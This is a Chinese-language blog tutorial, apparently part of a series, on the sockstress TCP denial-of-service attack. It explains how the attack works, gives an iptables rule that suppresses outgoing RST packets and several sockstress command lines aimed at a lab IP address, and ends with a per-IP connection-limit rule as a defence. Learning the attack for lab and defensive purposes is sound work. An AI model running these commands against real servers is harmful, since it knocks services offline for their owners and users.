DDOS渗透与攻防(三)之socktress攻击

已于 2023-01-28 13:36:22 修改
阅读量1.1k 收藏 2
点赞数 1
分类专栏: DOS与DDOS渗透与攻防 文章标签: ddos 网络 服务器 网络安全 安全
于 2023-01-28 13:31:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/128777126
版权
系列文章

DDOS渗透与攻防(一)之拒绝服务攻击概念介绍
DDOS渗透与攻防(二)之SYN-Flood攻击

socktress攻击

攻击协议原理介绍说明-socktress

2008年有Jack C.Louis发现,针对TCP服务的拒绝服务攻击:

  • 消耗被攻击目标系统资源,与攻击目标建立大量socket链接
  • 完成三次握手最后的ACK包window大小为0(客户端不接收数据),攻击者资源消耗小(CPU 内存 带宽)
  • 异步攻击,单机可拒绝服务高配资源服务器
  • window窗,实现的TCP流控

利用脚本实现socktress攻击:

攻击脚本:socktress
环境准备:

# 防火墙需要进行配置,阻止RST包发出
iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 192.168.110.23 -j DROP
说明:发一个包释放一个连接,这种达不到攻击郊果。要构成攻击效果可以通过iptables限止发送RST包

攻击命令:HTTP协议访问

# C攻击脚本
./sockstress 192.168.110.23:80 eth0
./sockstress 192.168.110.23:80 eth0 -d 100000
./sockstress 192.168.110.23:80 eth0 -p payloads/http
说明:-d是微秒内指定,默认为1000000  改成10之后并发带度更快

在这里插入图片描述在这里插入图片描述

我们来看一下攻击的效果:
在这里插入图片描述
在这里插入图片描述

可以看到我们发起的socktress攻击

网站一直无法响应:
在这里插入图片描述
攻击效果抓包截图:
在这里插入图片描述
在这里插入图片描述

攻击防护措施方法:

直到今天sockstress攻击仍然是一种很有效的DoS攻击方式,甶于建立完整的TCP三步握手,因此使用syn cookie防御无效,根本的防御方法是采用白名单(不实际)

折中对策:限制单位时间内每IP建的TCP连接数

#封杀每30秒与80端口建立连接超过10个的IP地址
iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --update --seconds 30 --hitcount 10 -j DROP
怰月
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
)拒绝服务–Sockstress 攻击
weixin_41082546的博客
03-14 622
1. 简介 2008年由Jack C.Louis 发现 针对TCP服务的拒绝服务攻击 消耗被攻击目标系统资源 与攻击目标建立大量socket链接 完成次握手,最后的ACK包中window大小为0 (客户端不接收数据) 客户端与服务端实时协商,你有多大的窗口我给你传多少资源,这是一个互相协商的过程 客户端发送完ack后就完毕了,不会太多占用本地资源,而服务器一直处于等待状态。 攻击者资源消耗...
DDoS攻击与防御:从原理到实践
02-24
出于打击报复、敲诈勒索、政治需要等各种原因,加上攻击成本越来越低、效果特别明显等趋势,DDoS攻击已经演变成全球性的网络安全威胁。根据卡巴斯基2016Q3的调查报告,DDoS攻击造成61%的公司无法访问其关键业务信息...
Smurf攻击Sockstress
分享学习网络的点点滴滴
11-01 353
世界上最古老的DDoS攻击技术向广播地址发送伪造源地址的ICMP echo Request(ping)包LAN所有计算机向伪造源地址返回响应包对现代操作系统已经失效(不响应目标为广播的ping)Scapy。
结合Socket实现DDoS攻击
weixin_33840661的博客
03-03 2602
一、实验说明 1. 实验介绍 通过上一节实验的SYN泛洪攻击结合Socket实现DDoS攻击。 2. 开发环境 Ubuntu Linux Python 3.x版本 3. 知识点 本次实验将涉及以下知识点: argparse 命令解析 socket的基本用法 4. 效果图 二、理论知识 1. 实现思路 由于上节实验我们已经实现了SYN泛洪攻击,而DDoS则是多台主机一起发起攻击,我们只需...
Sockstress:新而有效的DoS(拒绝服务)攻击
Purpleendurer@CSDN
10-15 3750
Sockstress: A new and effective DoS attackSockstress:新而有效的DoS(拒绝服务)攻击 Author: Michael Kassner作者:Michael Kassner 翻译:endurer,2008-10-15 第1版 Category: security, Infrastructure类别:安全,基础设施 T
RO IOCP开发心得系列(01):服务器程序防止Socket攻击的解决方案
dctc85941的博客
09-14 305
我这里说的“Socket攻击”是指,用一台或N台肉机进行TCP连接,以此来消耗服务器程序的可用Socket。 看了很多程序或组件的源代码,一般对客户端Socket管理是这样的: 1、用一个TThreadList(只要是线程安全的列表管理都行)来存储连接成功的Socket:后文统称“Socket列表” 2、服务器程序预设一个超时时间,比如10秒 3、限制每个IP能连接的Soc...
sockstress dos attack
ipconfigme的专栏
11-08 203
最近瑞典两个人吹的比较火的东,但是他们一直没有说出一些细节性质的东西,大家根据他们的访谈,推测是之前的一个DoS攻击。nmap邮件列表里面的一个讨论:http://insecure.org/stf/tcp-dos-attack-explained.html基本思想:The basic idea is to first firewall your source address(es) using a...
华安解密之DDoS攻防-06HTTP原理篇HTTPGETFlood
01-27
看过了我们上一篇解密的搜狐视频攻击事件,大家一定心有惶惶,上网看视频本属于娱乐消遣活动,居然会触发DDoS攻击,而每一个观看视频的人在不知不觉中就变成了攻击者的帮凶。可见,网络江湖异常险恶,攻防之间此消彼...
华安解密之DDoS攻防2-DNS原理篇DNSRequestFlood
02-24
要想弄明白DNS攻击的原理,就要先明白DNS协议的基础,我们还是从DNS协议本身讲起。DNS由RFC1034、1035协议定义规范,属于应用层协议。在前一篇中,我们也说了,DNS域名解析是互联网上非常重要的一项服务,我们每天...
2019年DDoS威胁态势与攻防产业链研究报告.pdf
04-19
为透视网络攻击内在机制与安全趋势,帮助企业从容应对风险与挑战,数世咨询、白山云科技及上海云盾将于4月16日联合发布《2019年DDoS威胁态势与攻防产业链研究报告》与《2019年全球互联网安全态势报告
Kali Linux渗透测试 127 拒绝服务--Sockstress 攻击
kevinhanser
04-11 1963
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 简介 2008年由Jack C.Louis 发现 针对TCP服务的拒绝服务攻击 消耗被攻击目标系统资源 与攻击目标建立大量socket链接 完成次握手,最后的ACK包window 大小为0 (客户端
Kali DDOS/ddos 拒绝服务攻击-sockstress攻击
最新发布
weixin_69830800的博客
06-25 291
我们去查看win7(靶机)的cpu性能,攻击持续时间越长占用率越高,访问apache2的页面就会出问题。我们使用phpstudy小皮面板,在win7下面搭建一个本地的网站。与SYN泛洪不同,sockstress实际上完成了连接,并且。攻击者消耗少量资源,而服务端消耗大量资源。无法使用SYN Cookie阻止。)压缩文件解压,然后执行。
SOCKET通信端口被攻击
u010174217的专栏
06-23 747
SOCKET通信端口被攻击 公司项目在使用SOCKET通信功能时,因为公司使用的是阿里云服务器,并且防火墙功能也使用了,在阿里云服务器中要放开对应SOCKET通信的端口,放开端口后就会出现被攻击的现象,在最开始阿里云服务器配置放开项目的对应端口时,一开始以为是SOCKET通信程序的逻辑出问题了,碰到以下两个问题: 问题1:阿里云服务器的监控功能默认每5秒访问这个端口一次,以此判断此端口是否畅通的。这个是阿里云服务器内部检测的功能, TCP协议端口检测功能不能关闭。 解决方案:把默认每...
SOCKSTRESS攻击原理与防御
hl1293348082的专栏
04-05 841
SockStress攻击正好与Syn-Flood攻击原理相悖,它正是利用建立TCP/IP次握手连接来实现拒绝服务攻击,而且与Syn-Flood不同它并非通过耗尽服务器的TCP连接数来让正常用户的正常请求无法响应,而是直接耗尽服务端的内存、CPU等资源让受害者宕机,属于非对称的资源消耗攻击,这种攻击方式的危害性极大,而且一旦遭受分布式攻击是几乎不能被抵御的。 0x01. SOCKSTRESS攻击原理 上篇文章已经给大家介绍过TCP/IP的握手过程了,所以这里就只讲一下SOCKSTRESS攻击
基于Socket进行远程攻击
qq_45616828的博客
10-27 178
P48
黑客攻击-深入理解socket
helloworlddm的博客
07-01 963
声明:谢绝一切形式的转载 socket套接字 socket起源于Unix,而Unix/Linux基本哲学之一就是“一切皆文件”,都可以用“打开open –> 读写write/read –> 关闭close”模式来操作。Socket就是该模式的一个实现, socket即是一种特殊的文件,一些socket函数就是对其进行的操作(读/写IO、打开、关闭). 说白了Socket是应用层与TCP/IP协议族通信的中间软件抽象层,它是一组接口。在设计模式中,Socket其实就是一个门面模
DoS与DdoS攻防分析之——流量放大与sockstress攻防
温柔小薛的博客
05-10 533
流量放大与sockstress攻防 sockstress攻击 原理简介 2008年由 Jack C. Louis 发现,针对TCP服务的拒绝服务攻击 消耗被攻击目标系统资源 与攻击目标建立大量socket链接 完成次握手,最后的ACK包window大小为0 (客户端不接收数据) 攻击者资源消耗小(CPU、内存、带宽) 与SYN不同在于完成次握手 攻击时在攻击端抓包可以看见win=0 异步攻击,单机可拒绝服务高配资源服务器 Window窗口实现的TCP流控 攻击方法 有的时候使用工具的时候提示权限不够
socket通信如果大量恶意攻击怎么办_恶意软件之"地下工作"
weixin_39778582的博客
12-08 353
一次性付费进群,长期免费索取教程,没有付费教程。进微信群回复公众号:微信群;QQ群:460500587教程列表见微信公众号底部菜单 |本文底部有推荐书籍微信公众号:计算机与网络安全ID:Computer-network当恶意软件成功地感染目标系统,对其建立了完全的控制和操作,且活跃在内存中,它就可以支配所控制的系统资源来完成相关任务。一旦激活,它会立即采取行动,并执行其主要指令...
基于sdn的ddos攻击检测与防御
06-12
基于SDN的DDoS攻击检测与防御是一种新型的网络安全防御方案。SDN(Software Defined Networking)是一种网络虚拟化技术,它将网络控制平面和数据平面分离,使网络更加灵活、可编程和可控。 在基于SDN的DDoS攻击检测...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值